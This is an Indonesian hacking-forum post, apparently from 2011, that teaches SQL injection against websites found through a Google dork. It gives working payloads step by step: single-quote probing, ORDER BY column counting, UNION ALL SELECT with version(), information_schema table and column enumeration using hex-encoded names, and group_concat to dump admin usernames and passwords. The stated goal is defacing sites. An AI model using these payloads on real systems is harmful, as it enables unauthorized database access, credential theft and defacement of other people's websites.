Magnet Forum l Forum Komunitas Bersama
† ™ Welcome And Zone MagNeT ™ †™

[-]Yang Belum Punya User DI MagNeT Harap Register.
[-]Yang Sudah Ada Di HarapKan Log In Terlebih Dahulu.
[-]DaftarKan User Anda Di VIP(Terdapat Aplikasi Lebih Banyak).


~Thankz For ALL MagNeT~
---------------------------------------------------------


My Facebook : anggadnewcyber@yahoo.co.id

AWALI USER KALIAN DENGAN MGH
Contoh MGH|Admin

Magnet Forum l Forum Komunitas Bersama

Magnet Forum l Forum Komunitas Bersama
 
IndeksCalendarFAQPencarianAnggotaGroupPendaftaranLoginBlogGroup
Login
Username:
Password:
Login otomatis: 
:: Lupa password?
Top posters
Admin
 
MGH|RayMAGNET
 
MGH|Ariezh
 
Sofian Karameca II
 
MGH|Synyster|NewbieHacker
 
rehan™
 
GBT_pRo_Mot
 
Mgh|RonyPinem
 
monggo12
 
Magnet.Forum
 
Latest topics
Similar topics
MGH_mp3

Share | 
 

 SQL Injection Tutorial

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
MGH|Synyster|NewbieHacker
Staff [MT]
Staff [MT]


Jumlah posting : 32
Points : 47
Reputation : 2
Join date : 17.11.11
Age : 22
Lokasi : Bogor|City

PostSubyek: SQL Injection Tutorial   Wed Dec 21, 2011 6:47 am

SQL Injection Web dengan Dork
SQL injection merupakan aksi hacking pada keamanan komputer di mana seorang penyerang bisa mendapatkan akses ke basis data di dalam sistem. Langsung aja ya ke permasalahannya yaitu Teknik SQL Injection dengan Dork namun Sebelum men daface sebuah situs, kita bisa menggunakan dork Sql Injection dengan bantuan om google
inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"
Misal yang didapat :
[You must be registered and logged in to see this link.]
untuk mengecek bug pada suatu web tambahkan single quote ( ' ) dibelakang url
[You must be registered and logged in to see this link.]


Setelah itu akan muncul bug pesan error :
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '\' and b.id=a.cat' at line 1

Untuk mencari column gunakan perintah [ order by ]
[You must be registered and logged in to see this link.] order by 1--
mulai dari angka 1,2,3 dan seterusnya hingga menemukan pesan error selanjutnya 2, dst sampe muncul pesan error "Unknown column '17' in 'order clause'"
Pesan error muncul pada angka 17
[You must be registered and logged in to see this link.] order by 17--
muncul pesan error:
Unknown column '17' in 'order clause'

Jadi angka yang diambil adalah 17-1 = 16 (jumlah column adalah 16)

Berikutnya kita akan mencari "angka" dimana dengan angka tersebut kita bisa melakukan injection dengan perintah "union all select"
[You must be registered and logged in to see this link.] union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter ID 35

akan muncul "angka" : 4, 7 dan 13
Pilih salah satunya saja, misal 4
Langsung kita cari versi Database MySql-nya dengan perintah [version()] atau [@@version] pada angka 4
[You must be registered and logged in to see this link.] union all select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16--

Nanti diweb tersebut akan muncul tulisan :
5.0.91-community
Ternyata versi 5, kalau versi 4 lain waktu akan saya bahas.

Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka dan menambahkan "+from+information_schema.tables+where+table_schema=database()--" di belakang angka 16
[You must be registered and logged in to see this link.] union all select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where table_schema=database()--

Akan muncul nama-nama table :
login,tbanner,tcatprod,tproduct,tset dan lain-lain

Selanjutnya kita cari column dari table yg ada hubungannya dengan user+password,
kali ini kita ambil table "login"
sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :
[You must be registered and logged in to see this link.]
ketik : login
pilih ASCII to Hex
hasilnya : 6c6f67696e

Perintah selanjutnya adalah "group_concat(column_name)" pada angka 4 dan "+from+information_schema.columns+where+table_name=0xHEXA--" di akhir URL

ganti HEXA dengan hasil convert tadi yaitu : 6c6f67696e
tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert
ke hexa
[You must be registered and logged in to see this link.] union all select
1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16+from+info
rmation_schema.columns+where+table_name=0x6c6f67696e--

muncul column : user,pass

untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 4 dan +from+NAMATABLE-- pada akhir URL

ganti column 1 dengan " user " dan column 2 dengan " pass "
0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa
NAMA TABLE diganti dengan " login " untuk mengambil informasi dari table yang bernama
"login"
[You must be registered and logged in to see this link.] union all select
1,2,3,group_concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16+from+login--

hasil : admin:admin
jadi,
user = admin
password = admin

Selesai pencarian User dan Password, dilanjutkan ke pencarian Page Admin.
Untuk mencari page admin, gunakan aplikasi berikut:
Donload Disene




-No JUNK
-No FLAME
-No DOUBLE POSTING
-No LEACHER
-No SARA
-No CAPS Berlebihan
-No Promosi ****/*****
Kembali Ke Atas Go down
Lihat profil user http://bhepalcheater.blogspot.com/
 
SQL Injection Tutorial
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Injection Open Loop vs Close Loop
» (Ask) Ninja 250 Injection vs. Carbu
» Tutorial Gear Design ?
» Knalpot R9 Ninja 250 Injection 2013
» [Tutorial] Effective Blog Exchange

Permissions in this forum:Anda tidak dapat menjawab topik
Magnet Forum l Forum Komunitas Bersama :: Magnet | Cyber :: Programming-
Navigasi: